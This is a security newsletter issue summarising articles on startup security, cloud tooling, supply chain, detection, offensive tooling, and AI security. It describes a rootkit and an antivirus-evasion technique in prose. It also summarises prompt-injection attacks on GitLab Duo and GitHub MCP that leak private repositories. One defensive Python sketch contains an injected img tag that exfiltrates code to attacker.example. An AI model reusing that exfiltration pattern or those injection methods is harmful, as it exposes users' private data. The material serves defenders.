[tl;dr sec] #281 - Free AI Red Teaming Labs, Cloud Security Roadmaps, o3 Finds 0-day


Free Black Hat training by Microsoft's AI red team, a cloud security roadmap for your start-up, o3 finds an 0-day in the Linux kernel’s SMB implementation

Clint Gibler
May 29, 2025

Hey there,

I hope you’ve been doing well!

🤔 Birthday Reflections

In a few weeks it’ll be my birthday!

Every year, on New Year's and/or my birthday, I feel the urge to write a reflection about how the year went, thoughts on the future, etc.

And almost without fail I never actually do it 😅

But this time I’m (mostly) optimistic I will!

If there’s anything you’d be curious to hear about, just respond to this email 💌

Currently I’m thinking the rough structure will be something like reflections/lessons learned across Semgrep (day job), tl;dr sec (night/weekend job), and personal life (theoretical).

Feel free to let me know what you’d be curious to know more about 🫡

Sponsor

📣 Bridge the Visibility Gaps in Google Workspace Security

Your cloud workspace isn’t just another app. It’s the heart of your business and it deserves purpose-built protection. Material was built from the ground up to secure Google Workspace and Microsoft 365, recognizing that your most valuable data lives in Gmail, Drive, and shared accounts, not on endpoints. Unlike legacy tools awkwardly adapted from perimeter security, Material delivers integrated, real-time defense that closes the visibility gaps between email, files, and identity. Don’t protect your cloud with tools meant for something else. Secure it with Material.

👉 See Purpose-Built Security in Action 👈

Material has some cool features! I like the customizability, how you can redact sensitive info in old Google Workspace emails/docs/etc., and generally get visibility into your cloud workspace 🤘

AppSec

High Leverage Security Decisions
Dade discusses key security decisions for early-stage startups to minimize long-term risks and ease future audits. He recommends adopting an identity provider (like Google Workspace, Okta, or Microsoft Entra ID) early for centralized access management and SSO, enforcing hardware security keys for phishing-resistant MFA, using infrastructure as code (e.g. Terraform/OpenTofu) for version control and peer review of changes, leveraging managed cloud services, and implementing an MDM solution for device management.

Security Is Just Engineering Tech Debt (And That's a Good Thing)
Srajan Gupta argues that security should be treated as regular engineering work, like any other tech debt, rather than as a separate discipline. He advocates for integrating security into standard engineering processes by:

Threat modeling during design: don’t separate security requirements from functional requirements.
Including security metrics in observability stacks: your app’s security telemetry should be in the same dashboard as the signals for performance, reliability, business metrics.
Measuring security debt like you measure other tech debt, including its impact on velocity, reliability, and maintenance costs.
Using the same incident response procedures for all issues.

Starting a Security Program from Scratch (or re-starting)
Excellent post by Phil Venables outlining a 16-step framework for building or rebuilding a security program across four phases:

Face the Right Direction: Put someone in charge, establish a governance/oversight process, conduct a critical systems security/breach test, address high risks immediately.
Cover the Basics: Perform a broad security review against frameworks like NIST Cyber Security Framework and CIS Critical Controls, develop a multi-stage implementation plan to close gaps, select managed service providers to help, build a team.
Make it Routine/Sustainable: Program manage your enhancements, establish continuous risk assessment and control monitoring, increase resilience through scenario planning, and consider risk transfer options like cyber insurance.
Make it Strategic: Align security with business objectives, extend security capabilities to support customers/products, improve team skills, and conduct red team exercises.

Sponsor

📣 AI Is Writing Code—But Can It Secure It?

Hype vs. Reality

With the rise of tools like GitHub Copilot and Cursor, security teams are racing to keep up. AI-native security tools promise to help—but are they ready for production? In this new 2025 report, Latio Tech puts top AI security vendors to the test against real-world code vulnerabilities. See who detects, who fixes, and who falls short. Normally paywalled, Amplify Security is offering the full report free for a limited time.

👉 Get the Free Report 👈

Nice, AI auto-fixing code is a super hot area, I’ve been waiting to see a comparison of a bunch of people’s approaches 🤘

Cloud Security

silverhack/monkey365
By Juan Garrido Caballero: A tool for security consultants to easily conduct security configuration reviews of Microsoft 365, Azure subscriptions, and Microsoft Entra ID.

macalbert/envilder
By Marçal Albert: A CLI that securely centralizes your environment variables from AWS SSM as a single source of truth.

Hunting for Bucket Traversals in Google's Client Libraries
Jakub Domeracki describes a bucket traversal vulnerability he found in Google's Cloud Storage Python client library, which would allow an attacker to supply a blob name like ../bucket/object to upload files to unintended buckets, potentially leading to overwriting existing files or having the object later consumed by the application in a dangerous way (config override, XSS, etc.).
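
To make the traversal concrete, here is a minimal Python sketch. It is a simplified model, not the client library's actual code: it assumes the request path is built by joining the bucket and blob name and then gets normalized somewhere along the way. `resolve_target` and `is_safe_blob_name` are hypothetical helpers, not part of any Google library.

```python
import posixpath


def resolve_target(bucket: str, blob_name: str) -> tuple[str, str]:
    """Model where an object lands if "/<bucket>/<blob_name>" is path-normalized.

    Simplified assumption for illustration; not the real client library logic.
    """
    normalized = posixpath.normpath(f"/{bucket}/{blob_name}")
    resolved_bucket, _, resolved_object = normalized.lstrip("/").partition("/")
    return resolved_bucket, resolved_object


def is_safe_blob_name(blob_name: str) -> bool:
    """Reject user-supplied names that contain "." or ".." path segments."""
    return not any(segment in (".", "..") for segment in blob_name.split("/"))


if __name__ == "__main__":
    # The app intends to write into "uploads", but the name climbs out of it.
    print(resolve_target("uploads", "../configs/app.yaml"))
    print(is_safe_blob_name("../configs/app.yaml"))
    print(is_safe_blob_name("reports/2025/q1.pdf"))
```

If blob names come from users, validating them before they reach the storage client (as in `is_safe_blob_name`) is one cheap layer of defense, alongside keeping the client library up to date.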

Setting Up a Cloud Security Roadmap for Your Startup
Chandrapal Badshah provides a practical guide for startups to create an effective cloud security roadmap. He outlines key questions to consider (cloud platforms used, top security priorities, relevant cloud services, and scope), compares existing AWS security roadmaps (by Scott Piper, Marco Lancini, and AWS), and offers tips for customization. Key advice: align the roadmap with business objectives, prioritize based on your startup's specific risks, start with fundamental controls, include both preventive and detective controls, and regularly review and update the plan.

Supply Chain

Renovate: Could you please bump that version?
Sebastian Poxhofer shows how to use Renovate's new Generic Version Bump feature, which allows bumping semantic versions in files based on changes in other files, even if they're not directly related. The post includes an example of automatically updating Helm chart versions when the appVersion changes. This feature works with any file format and can be triggered by package file or lock file changes.

💡 Anything that makes patching easier or automatic is 👌 in my book.

Demonstrably Secure Software Supply Chains with Nix
Nixcademy’s Jacek Galowicz shows how Nix can be used for software supply chain integrity (e.g. for regulatory compliance) by following a process that proves that the final binary was derived solely from trusted sources, including all dependencies and build tools. The process involves using Nix to build a complete dependency tree, extracting all fixed-output derivations (source packages), exporting them to an offline system, and rebuilding everything from scratch. See this GitHub repo for an example implementation.

Commit Stomping
Andy Gill describes “Commit Stomping”: using legitimate git features to alter commit timestamps, which can mislead observers, allowing an attacker to introduce malicious code while making incident response and constructing a forensic timeline more difficult. Andy describes how Commit Stomping can be done via environment variables like GIT_AUTHOR_DATE and GIT_COMMITTER_DATE and commands like git rebase, git commit --amend, or git filter-branch.

The post ends with a nice discussion of potential defenses: require and verify signed commits, capture commit metadata on ingest, use mirrored repos with immutable storage, lock down history rewriting, and monitor for anomalous patterns.
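
As a rough illustration of the "capture commit metadata on ingest" and "monitor for anomalous patterns" ideas, here is a minimal Python sketch. The `Commit` record, the `suspicious_commits` helper, the three heuristics, and the 5-minute skew allowance are all my own assumptions for illustration, not something taken from Andy's post.

```python
from dataclasses import dataclass


@dataclass
class Commit:
    sha: str
    author_ts: int     # seconds since epoch, from the commit's author date
    committer_ts: int  # seconds since epoch, from the commit's committer date
    ingested_ts: int   # when our own server first saw the commit (trusted clock)


def suspicious_commits(history: list[Commit], max_skew: int = 300) -> list[tuple[str, str]]:
    """Return (sha, reason) pairs for commits with implausible timestamps.

    `history` is ordered oldest to newest along a single branch.
    """
    findings = []
    previous = None
    for commit in history:
        if commit.committer_ts > commit.ingested_ts + max_skew:
            findings.append((commit.sha, "committer date is after ingest time"))
        if commit.author_ts > commit.committer_ts + max_skew:
            findings.append((commit.sha, "author date is after committer date"))
        if previous and commit.committer_ts + max_skew < previous.committer_ts:
            findings.append((commit.sha, "committer date is before its parent's"))
        previous = commit
    return findings


if __name__ == "__main__":
    history = [
        Commit("a1", author_ts=1000, committer_ts=1000, ingested_ts=1100),
        Commit("b2", author_ts=500, committer_ts=500, ingested_ts=2100),  # back-dated
    ]
    for sha, reason in suspicious_commits(history):
        print(sha, reason)
```

The key design choice is that `ingested_ts` comes from a clock the committer cannot control, which is what makes the self-reported dates checkable at all. Expect some noise from legitimate rebases and cherry-picks.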

Blue Team

kunai-project/kunai
By Kunai Project: A threat hunting tool for Linux leveraging eBPF for kernel-level event monitoring. Like Sysmon for Windows. Written in Rust.

Leveraging Sysmon to Complement EDR and Address Evasion Techniques
Siddhant Mishra discusses a number of specific EDR evasion techniques and how to detect them with Sysmon, including: kernel hooking and unhooking, direct syscall injections, DLL unhooking, memory manipulation with process hollowing, and Asynchronous Procedure Call (APC) injection.

Rude Awakening: Unmasking Sleep Obfuscation With TTTracer
Felix Mehta describes how to use TTTracer, a WinDBG component pre-installed on modern Windows, and Time Travel Debugging to defeat sleep obfuscation techniques used by modern malware (basically sleeping to avoid analysis). He demonstrates capturing a full execution trace of a Havoc implant, then using WinDBG to analyze the trace and extract the decrypted implant and configuration. This approach can potentially retrieve decrypted payloads and track malware activities more effectively than traditional memory dumps.

Red Team

carloslack/KoviD
A Linux kernel rootkit with features including: self-hiding from SysFS, reverse shell backdoors, hiding processes/files, evading detection through Ftrace-based syscall hijacking and port-knocking, and more.

Evading Defender With Python And Meterpreter Shellcode: Part 1
infosecfacts describes a technique for running Meterpreter shellcode while evading Windows Defender and other AVs by translating a basic C shellcode loader to Python using ctypes, which allows interacting with Win32 API endpoints. When tested against 8 security products, only Bitdefender blocked it completely. The post also provides a basic Elastic EDR detection rule and discusses future improvements like sandbox evasion techniques and encrypting the shellcode, then decrypting it in memory.

Attacking EDRs Part 4: Fuzzing Defender's Scanning and Emulation Engine (mpengine.dll)
InfoGuard’s Manuel Feifel describes fuzzing Microsoft Defender’s scanning and emulation engine mpengine.dll, finding multiple out-of-bounds read and null dereference bugs using Snapshot Fuzzing with WTF, as well as kAFL/NYX and Jackalope. These bugs can be used to crash the main Defender process as soon as the file is scanned: a malicious file could be delivered alongside an initial access payload to kill Defender before the payload executes, allowing subsequent malicious actions without detection or prevention. The bugs do not appear to be exploitable for code execution. See also:

Part 1 gives an overview of the attack surface of EDR software and describes the process for analyzing drivers from the perspective of a low-privileged user.
Part 2 describes the results of the EDR driver security analysis.
Part 3 describes a DoS vulnerability affecting most Windows EDR agents.

AI + Security

microsoft/AI-Red-Teaming-Playground-Labs
This repo contains the challenges for the labs that were used in the course “AI Red Teaming in Practice,” originally taught at Black Hat USA 2024 by Dr. Amanda Minnich, Gary Lopez, and Martin Pouliot. There are 12 challenges covering credential exfiltration, extracting a secret from the metaprompt, indirect prompt injection, and more!

From idea to (secure) app: Semgrep + Replit
Announcing the Semgrep 🫶 Replit partnership. Now Replit users can turn on the new pre-deployment scanning feature, which lets Replit Agent run a Semgrep scan to automatically find security issues via a curated set of Python, JavaScript, and TypeScript rules.

💡 Semgrep is also having a Spring Release webinar to discuss the roughly one million new features shipped recently.

Remote Prompt Injection in GitLab Duo Leads to Source Code Theft
Legit Security’s Omer Mayraz describes how GitLab Duo, GitLab’s AI Assistant, was vulnerable to prompt injection in merge request (MR) descriptions and comments, commit messages, issue descriptions and comments, and source code.

A prompt injection that injects untrusted HTML into Duo’s responses (e.g. img tags) could be used to exfiltrate private source code the victim has access to, sensitive issue data (e.g. vulnerabilities), etc.
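
To see why rendering model output as HTML matters here, consider this minimal Python sketch of the generic mitigation: treat the assistant's reply as untrusted and escape it before it reaches the browser. This is not GitLab's actual fix; `render_untrusted_reply` and the attacker URL are hypothetical.

```python
import html


def render_untrusted_reply(reply: str) -> str:
    """Escape model output so any injected markup is displayed as plain text."""
    return html.escape(reply, quote=True)


if __name__ == "__main__":
    # A prompt injection has convinced the assistant to emit an image tag whose
    # URL carries stolen data. If rendered as HTML, the browser would fetch it.
    injected = 'Looks good! <img src="https://attacker.example/c?d=BASE64_OF_PRIVATE_CODE">'
    print(render_untrusted_reply(injected))
```

Escaping everything is the blunt option. An assistant that needs rich output would instead need an allowlist-based sanitizer that strips tags capable of making external requests.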

GitHub MCP Exploited: Accessing private repositories via MCP
Invariant Labs’ Marco Milanta and Luca Beurer-Kellner describe basically the same vulnerability: a malicious GitHub Issue could cause the GitHub MCP integration to leak sensitive info about a user’s private repos.

💡 The discussion towards the bottom of a) implementing runtime guardrails of acceptable tool call patterns / context-aware access controls and b) auditing agent <> MCP interactions is pretty interesting. People have identified this is a problem, but solutions are still quite nascent, so it’ll be neat to see how this sorts out.

How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation
Sean Heelan describes using OpenAI's o3 model to find a zero-day use-after-free vulnerability with nothing more complicated than the o3 API – no scaffolding, no agentic frameworks, no tool use. The vulnerability it found requires reasoning about concurrent connections to the server, and how they may share various objects in specific circumstances.

Sean also describes testing o3 on a prior vulnerability he found, and the context he gave to the LLM to reason about (a ‘session setup’ command handler + the code for all the functions it calls, up to a call depth of 3), along with the prompts used and code analyzed.
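
If you want to try something similar on your own code, the "handler plus everything it calls, up to a call depth of 3" selection is a bounded breadth-first walk over a call graph. A minimal Python sketch, assuming you already have a call graph from some static analysis tool. The function names are made up, and counting the handler itself as depth 0 is my assumption, not necessarily how Sean counted.

```python
from collections import deque


def functions_within_depth(call_graph: dict[str, list[str]], entry: str, max_depth: int = 3) -> dict[str, int]:
    """Return every function reachable from `entry` within `max_depth` calls,
    mapped to the depth at which it was first reached (entry is depth 0)."""
    depth_of = {entry: 0}
    queue = deque([entry])
    while queue:
        caller = queue.popleft()
        depth = depth_of[caller]
        if depth == max_depth:
            continue  # do not expand callees beyond the depth limit
        for callee in call_graph.get(caller, ()):
            if callee not in depth_of:
                depth_of[callee] = depth + 1
                queue.append(callee)
    return depth_of


if __name__ == "__main__":
    # Hypothetical call graph; names are illustrative only.
    call_graph = {
        "handle_session_setup": ["authenticate", "alloc_session"],
        "authenticate": ["parse_blob"],
        "parse_blob": ["decode_token"],
        "decode_token": ["copy_bytes"],
    }
    for name, depth in functions_within_depth(call_graph, "handle_session_setup").items():
        print(depth, name)
```

The source for each selected function would then be concatenated into the prompt. The depth limit is what keeps the context small enough for the model to reason about.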

“The main takeaway from this post is this: with o3 LLMs have made a leap forward in their ability to reason about code, and if you work in vulnerability research you should start paying close attention.”

💡 I love the thoughtful methodology and that Sean shared the supporting artifacts (prompts, code targeted, etc.). Clearly this is a promising area of research. What’s also important here, that I don’t see most “AI + AppSec” companies talking about, is: how reliable are LLMs in detecting the same bug?

“o3 finds the kerberos authentication vulnerability in the benchmark in 8 of the 100 runs. In another 66 of the runs o3 concludes there is no bug present in the code (false negatives), and the remaining 28 reports are false positives.”
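
One way to reason about what an 8-in-100 hit rate means in practice is a back-of-the-envelope calculation. The Python sketch below assumes each run is independent and finds the bug with the same 8% probability, which is a simplification of mine rather than a claim from Sean's post. It also ignores the cost of triaging the false positives produced along the way.

```python
import math


def chance_of_at_least_one_hit(per_run_rate: float, runs: int) -> float:
    """Probability that at least one of `runs` independent runs finds the bug."""
    return 1 - (1 - per_run_rate) ** runs


def runs_needed(per_run_rate: float, target: float) -> int:
    """Smallest number of independent runs whose combined hit chance reaches `target`."""
    return math.ceil(math.log(1 - target) / math.log(1 - per_run_rate))


if __name__ == "__main__":
    rate = 8 / 100  # detection rate from the quoted benchmark
    print(f"10 runs: {chance_of_at_least_one_hit(rate, 10):.1%}")
    print(f"runs for a 95% chance: {runs_needed(rate, 0.95)}")
```

So a low per-run rate can still be useful if you can afford many runs, as long as someone (or something) can cheaply separate the real finding from the false positives.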

Misc

Meet the Secret Strategist Behind Alex Hormozi and GaryVee
Jay Clouse interviews Caleb Ralston. Wow, Caleb is a thoughtful dude 🤯 I really like his Brand Journey Framework, which takes you from your goal → what to do today. Start with the end in mind.

Goal - What is the outcome I want? Why am I doing this?
What would I have to be known for for that to happen?
What do I have to do in order to be known for the thing, in order for the outcome I desire to occur?
In order to do those things, what do I have to learn? (today)

So (today) what do I have to learn → in order to do the things → to be known for the things → so that my desired outcome occurs.

Misc

"The show doesn't go on because it's ready, it goes on because it's 11:30" - Lorne Michaels on SNL. Amanda Goetz tweet on getting things done by creating a deadline and telling people publicly. Personally, I’ve found external accountability and deadlines more effective than personal motivation 😅
Pieter Levels on visiting OpenAI, and reflections on SF/Silicon Valley culture
Thread: Could a government seize domain names?
Tyler Tringas: Reflections on the Delaware legal system (bad for defendants), using LLMs for legal help, and tips on reviewing your business insurance coverage
Life is Short - Enter your date of birth and life expectancy, and this page will show you your days, weeks, months, and years lived vs remaining.
The daily routine of Julie Clark, the 56-year-old whose biological age clocks in at 36, with a much more minimal approach than Bryan Johnson
Andrej Karpathy’s append-and-review note approach - A single Apple Notes text file where new ideas or TODOs are appended to the top.
The Onion - 213 Killed In How Do You Pronounce That?

Politics

Mysterious hacking group Careto was run by the Spanish government, sources say
Russia to enforce location tracking app on all foreigners in Moscow, providing authorities with real-time location, fingerprints, and facial photos.
The current U.S. administration wants to amp up offensive cyberattacks against China and other geopolitical rivals, while reducing defensive headcount at CISA and elsewhere. Sounds risky to me.
Phone companies failed to warn senators about U.S. government surveillance on Senate-issued devices. The U.S. gov’t surveilling policy makers sounds like something you’d read about for a third-world dictatorship 🫠
The United Arab Emirates received permission from the Pentagon to recruit former members of the U.S. Defense Digital Service displaced by DOGE to work on AI for the UAE military, despite warnings from U.S. spy agencies and federal lawmakers that the UAE could share AI technologies with China.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate it if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler